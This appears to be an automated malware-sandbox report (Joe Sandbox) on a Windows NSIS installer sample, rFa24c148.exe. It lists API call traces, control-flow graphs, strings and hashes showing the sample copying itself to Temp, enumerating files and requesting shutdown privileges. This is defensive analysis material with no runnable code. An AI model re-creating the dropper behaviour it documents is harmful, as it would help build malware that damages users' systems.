                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FA
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403402
                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403416
                                                                                              • OleUninitialize.OLE32(?), ref: 004034C6
                                                                                              • ExitProcess.KERNEL32 ref: 004034E6
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\rFa24c148.exe",00000000,?), ref: 004034F2
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\rFa24c148.exe",00000000,?), ref: 004034FE
                                                                                              • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040350A
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403511
                                                                                              • DeleteFileW.KERNEL32(0041FE58,0041FE58,?,0042A000,?), ref: 0040356B
                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\rFa24c148.exe,0041FE58,00000001), ref: 0040357F
                                                                                              • CloseHandle.KERNEL32(00000000,0041FE58,0041FE58,?,0041FE58,00000000), ref: 004035AC
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 00403602
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040363E
                                                                                              • ExitProcess.KERNEL32 ref: 00403661
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                              • String ID: "C:\Users\user\Desktop\rFa24c148.exe"$1033$C:\Program Files (x86)\shaw$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rFa24c148.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu.tmp
                                                                                              • API String ID: 4107622049-2644687472
                                                                                              • Opcode ID: 7dc04cae1505df307541da29feb1b78f76a738656bf7d790261999e19a40ed68
                                                                                              • Instruction ID: ad4a0f84636c0b66377e35c31726649c2eaf1ae8fb353dd82aac126218056701
                                                                                              • Opcode Fuzzy Hash: 7dc04cae1505df307541da29feb1b78f76a738656bf7d790261999e19a40ed68
                                                                                              • Instruction Fuzzy Hash: 99B1D030904210BAD7207F629D49A7B3EACEB45706F40497FF441B62E2D7BC9941CB6E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 116 405160-40517b 117 405181-40524a GetDlgItem * 3 call 403ff1 call 4048be GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40530c-405313 116->118 136 405268-40526b 117->136 137 40524c-405266 SendMessageW * 2 117->137 120 405315-405337 GetDlgItem CreateThread CloseHandle 118->120 121 40533d-40534a 118->121 120->121 122 405368-405372 121->122 123 40534c-405352 121->123 127 405374-40537a 122->127 128 4053c8-4053cc 122->128 125 405354-405363 ShowWindow * 2 call 403ff1 123->125 126 40538d-405396 call 404023 123->126 125->122 140 40539b-40539f 126->140 132 4053a2-4053b2 ShowWindow 127->132 133 40537c-405388 call 403f95 127->133 128->126 130 4053ce-4053d4 128->130 130->126 138 4053d6-4053e9 SendMessageW 130->138 141 4053c2-4053c3 call 403f95 132->141 142 4053b4-4053bd call 405021 132->142 133->126 143 40527b-405292 call 403fbc 136->143 144 40526d-405279 SendMessageW 136->144 137->136 145 4054eb-4054ed 138->145 146 4053ef-40541a CreatePopupMenu call 405d99 AppendMenuW 138->146 141->128 142->141 155 405294-4052a8 ShowWindow 143->155 156 4052c8-4052e9 GetDlgItem SendMessageW 143->156 144->143 145->140 153 40541c-40542c GetWindowRect 146->153 154 40542f-405444 TrackPopupMenu 146->154 153->154 154->145 157 40544a-405461 154->157 158 4052b7 155->158 159 4052aa-4052b5 ShowWindow 155->159 156->145 160 4052ef-405307 SendMessageW * 2 156->160 161 405466-405481 SendMessageW 157->161 162 4052bd-4052c3 call 403ff1 158->162 159->162 160->145 161->161 163 405483-4054a6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 4054a8-4054cf SendMessageW 163->165 165->165 166 4054d1-4054e5 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->145
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004051BF
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004051CE
                                                                                              • GetClientRect.USER32(?,?), ref: 0040520B
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 00405213
                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405234
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405245
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405258
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405266
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405279
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040529B
                                                                                              • ShowWindow.USER32(?,00000008), ref: 004052AF
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D0
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052E0
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052F9
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405305
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004051DD
                                                                                                • Part of subcall function 00403FF1: SendMessageW.USER32(00000028,?,00000001,00403E1D), ref: 00403FFF
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405322
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000050F4,00000000), ref: 00405330
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405337
                                                                                              • ShowWindow.USER32(00000000), ref: 0040535B
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405360
                                                                                              • ShowWindow.USER32(00000008), ref: 004053AA
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053DE
                                                                                              • CreatePopupMenu.USER32 ref: 004053EF
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405403
                                                                                              • GetWindowRect.USER32(?,?), ref: 00405423
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040543C
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405474
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405484
                                                                                              • EmptyClipboard.USER32 ref: 0040548A
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405496
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004054A0
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004054B4
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004054D4
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004054DF
                                                                                              • CloseClipboard.USER32 ref: 004054E5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: {
                                                                                              • API String ID: 590372296-366298937
                                                                                              • Opcode ID: da6ea4901efb283be28e634786642a951ca9a14736cadbfe75f68e92e901532f
                                                                                              • Instruction ID: 0991f248181b02e880a99382a637b1aa596eb82eb2a2f586ae382473c4d6dcb0
                                                                                              • Opcode Fuzzy Hash: da6ea4901efb283be28e634786642a951ca9a14736cadbfe75f68e92e901532f
                                                                                              • Instruction Fuzzy Hash: 9CB15970900209FFEB219F60DD89AAE7B79FB04355F00807AFA01BA1A0C7755E52DF69

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 408 405d99-405da4 409 405da6-405db5 408->409 410 405db7-405dcd 408->410 409->410 411 405dd3-405de0 410->411 412 405fe5-405feb 410->412 411->412 415 405de6-405ded 411->415 413 405ff1-405ffc 412->413 414 405df2-405dff 412->414 416 406007-406008 413->416 417 405ffe-406002 call 405d77 413->417 414->413 418 405e05-405e11 414->418 415->412 417->416 420 405fd2 418->420 421 405e17-405e53 418->421 422 405fe0-405fe3 420->422 423 405fd4-405fde 420->423 424 405f73-405f77 421->424 425 405e59-405e64 GetVersion 421->425 422->412 423->412 428 405f79-405f7d 424->428 429 405fac-405fb0 424->429 426 405e66-405e6a 425->426 427 405e7e 425->427 426->427 430 405e6c-405e70 426->430 433 405e85-405e8c 427->433 431 405f8d-405f9a call 405d77 428->431 432 405f7f-405f8b call 405cbe 428->432 434 405fb2-405fba call 405d99 429->434 435 405fbf-405fd0 lstrlenW 429->435 430->427 436 405e72-405e76 430->436 446 405f9f-405fa8 431->446 432->446 438 405e91-405e93 433->438 439 405e8e-405e90 433->439 434->435 435->412 436->427 442 405e78-405e7c 436->442 444 405e95-405eb2 call 405c44 438->444 445 405ecf-405ed2 438->445 439->438 442->433 454 405eb7-405ebb 444->454 447 405ee2-405ee5 445->447 448 405ed4-405ee0 GetSystemDirectoryW 445->448 446->435 450 405faa 446->450 452 405f50-405f52 447->452 453 405ee7-405ef5 GetWindowsDirectoryW 447->453 451 405f54-405f58 448->451 455 405f6b-405f71 call 40600b 450->455 451->455 459 405f5a-405f5e 451->459 452->451 457 405ef7-405f01 452->457 453->452 458 405ec1-405eca call 405d99 454->458 454->459 455->435 461 405f03-405f06 457->461 462 405f1b-405f31 SHGetSpecialFolderLocation 457->462 458->451 459->455 464 405f60-405f66 lstrcatW 459->464 461->462 465 405f08-405f0f 461->465 466 405f33-405f4a SHGetPathFromIDListW CoTaskMemFree 462->466 467 405f4c 462->467 464->455 469 405f17-405f19 465->469 466->451 466->467 467->452 469->451 469->462
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,?,00405058,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,00000000,0040FE48), ref: 00405E5C
                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405EDA
                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00405EED
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405F29
                                                                                              • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00405F37
                                                                                              • CoTaskMemFree.OLE32(?), ref: 00405F42
                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F66
                                                                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,?,00405058,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,00000000,0040FE48), ref: 00405FC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 900638850-937106742
                                                                                              • Opcode ID: bb187ed8235d5e602cac5fb493e7f0f28f0e0d380d5fcb884fe186b1f5943fdc
                                                                                              • Instruction ID: 8be6bcb63ccaebc5f1bc3563bf1d434f80ac3f189a087fad5798c32c49afab67
                                                                                              • Opcode Fuzzy Hash: bb187ed8235d5e602cac5fb493e7f0f28f0e0d380d5fcb884fe186b1f5943fdc
                                                                                              • Instruction Fuzzy Hash: 3661D271A00906ABEF209F25CC44AAF37A5EF54314F10813BE955BA2D0D73D5A81CF9E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 470 4055ff-405625 call 4058ca 473 405627-405639 DeleteFileW 470->473 474 40563e-405645 470->474 475 4057bb-4057bf 473->475 476 405647-405649 474->476 477 405658-405668 call 405d77 474->477 479 405769-40576e 476->479 480 40564f-405652 476->480 483 405677-405678 call 40580e 477->483 484 40566a-405675 lstrcatW 477->484 479->475 482 405770-405773 479->482 480->477 480->479 485 405775-40577b 482->485 486 40577d-405785 call 4060ba 482->486 487 40567d-405681 483->487 484->487 485->475 486->475 494 405787-40579b call 4057c2 call 4055b7 486->494 490 405683-40568b 487->490 491 40568d-405693 lstrcatW 487->491 490->491 493 405698-4056b4 lstrlenW FindFirstFileW 490->493 491->493 495 4056ba-4056c2 493->495 496 40575e-405762 493->496 510 4057b3-4057b6 call 405021 494->510 511 40579d-4057a0 494->511 499 4056e2-4056f6 call 405d77 495->499 500 4056c4-4056cc 495->500 496->479 498 405764 496->498 498->479 512 4056f8-405700 499->512 513 40570d-405718 call 4055b7 499->513 502 405741-405751 FindNextFileW 500->502 503 4056ce-4056d6 500->503 502->495 507 405757-405758 FindClose 502->507 503->499 508 4056d8-4056e0 503->508 507->496 508->499 508->502 510->475 511->485 514 4057a2-4057b1 call 405021 call 405c11 511->514 512->502 515 405702-40570b call 4055ff 512->515 523 405739-40573c call 405021 513->523 524 40571a-40571d 513->524 514->475 515->502 523->502 527 405731-405737 524->527 528 40571f-40572f call 405021 call 405c11 524->528 527->502 528->502
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 00405628
                                                                                              • lstrcatW.KERNEL32(dannebrogsordnen\gypseian.tof,\*.*,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 00405670
                                                                                              • lstrcatW.KERNEL32(?,00409014,?,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 00405693
                                                                                              • lstrlenW.KERNEL32(?,?,00409014,?,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 00405699
                                                                                              • FindFirstFileW.KERNELBASE(dannebrogsordnen\gypseian.tof,?,?,?,00409014,?,dannebrogsordnen\gypseian.tof,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 004056A9
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405749
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405758
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\rFa24c148.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dannebrogsordnen\gypseian.tof
                                                                                              • API String ID: 2035342205-1246840294
                                                                                              • Opcode ID: 42740435911353286c6922aa83c672c94fcfc96c868b16cb6d961babd0fb7d8c
                                                                                              • Instruction ID: b79195ecc2de65d8d99f91511e5e2c7060301b719c54f9eae921112220d3ef15
                                                                                              • Opcode Fuzzy Hash: 42740435911353286c6922aa83c672c94fcfc96c868b16cb6d961babd0fb7d8c
                                                                                              • Instruction Fuzzy Hash: 2C41CF30901A14F6DB216B618C89EAF7678EF45724F60457BF804721D1D77C89C1EE6E
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,004256E8,C:\,00405913,C:\,C:\,00000000,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004060C5
                                                                                              • FindClose.KERNEL32(00000000), ref: 004060D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
